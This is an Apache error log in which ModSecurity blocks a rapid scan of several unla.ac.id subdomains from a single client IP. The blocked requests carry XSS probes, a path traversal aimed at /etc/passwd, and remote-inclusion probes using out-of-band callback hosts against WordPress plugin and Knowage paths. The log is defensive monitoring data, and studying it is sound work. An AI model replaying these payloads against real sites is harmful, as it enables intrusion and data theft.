[Tue Aug 29 11:54:12.825437 2023] [:error] [pid 2659] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb06j6ieiy7jhi88.oast.site found within TX:1: cjmnijtjmimvgniikdb06j6ieiy7jhi88.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAApjILsAAAAm"]
[Tue Aug 29 11:54:12.871583 2023] [:error] [pid 2658] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0crqed1z1usn5k.oast.site found within TX:1: cjmnijtjmimvgniikdb0crqed1z1usn5k.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAApilx4AAAAl"]
[Tue Aug 29 11:54:13.548587 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0x6r9siwpo45fc.oast.site found within TX:1: cjmnijtjmimvgniikdb0x6r9siwpo45fc.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO159cCo-f0AAApWY2IAAAAM"]
[Tue Aug 29 11:54:14.120964 2023] [:error] [pid 2648] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAApYpoEAAAAa"]
[Tue Aug 29 11:54:14.147791 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAApQ2ZQAAAAb"]
[Tue Aug 29 11:54:14.151068 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAApbURgAAAAh"]
[Tue Aug 29 11:54:14.153562 2023] [:error] [pid 2646] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAApWY2cAAAAM"]
[Tue Aug 29 11:54:14.157214 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAAolKf4AAAAe"]
[Tue Aug 29 11:54:14.164416 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAAo2m-MAAAAA"]
[Tue Aug 29 11:54:14.604348 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAAo2m-QAAAAA"]
[Tue Aug 29 11:54:14.609908 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAApbURoAAAAh"]
[Tue Aug 29 11:54:14.640197 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAApmXssAAAAp"]
[Tue Aug 29 11:54:14.643723 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAAph8uEAAAAj"]
[Tue Aug 29 11:54:14.643851 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAAolKgAAAAAe"]
[Tue Aug 29 11:54:14.653623 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAAoGFkIAAAAE"]
[Tue Aug 29 11:54:14.663652 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAAox7RsAAAAN"]
[Tue Aug 29 11:54:14.667792 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAApa-B8AAAAg"]
[Tue Aug 29 11:54:14.668290 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAApLWqEAAAAI"]
[Tue Aug 29 11:54:14.677383 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAAo2m-YAAAAA"]
[Tue Aug 29 11:54:14.682771 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAApk-TUAAAAn"]
[Tue Aug 29 11:54:14.683583 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAApbUR0AAAAh"]
[Tue Aug 29 11:54:14.684155 2023] [:error] [pid 2653] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAApd2GMAAAAi"]
[Tue Aug 29 11:54:14.701664 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAApgAyQAAAAH"]
[Tue Aug 29 11:54:14.709342 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAAolKgMAAAAe"]
[Tue Aug 29 11:54:14.709499 2023] [:error] [pid 2658] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAApilykAAAAl"]
[Tue Aug 29 11:54:15.545530 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAApV20wAAAAJ"]
[Tue Aug 29 11:54:15.547014 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAApmXtAAAAAp"]
[Tue Aug 29 11:54:15.551965 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO1598Co-f0AAApk-TcAAAAn"]
[Tue Aug 29 11:54:15.553018 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO1598Co-f0AAAnHQwUAAAAT"]
[Tue Aug 29 11:54:15.557324 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAAo2m-gAAAAA"]
[Tue Aug 29 11:54:15.557906 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAApbUR8AAAAh"]
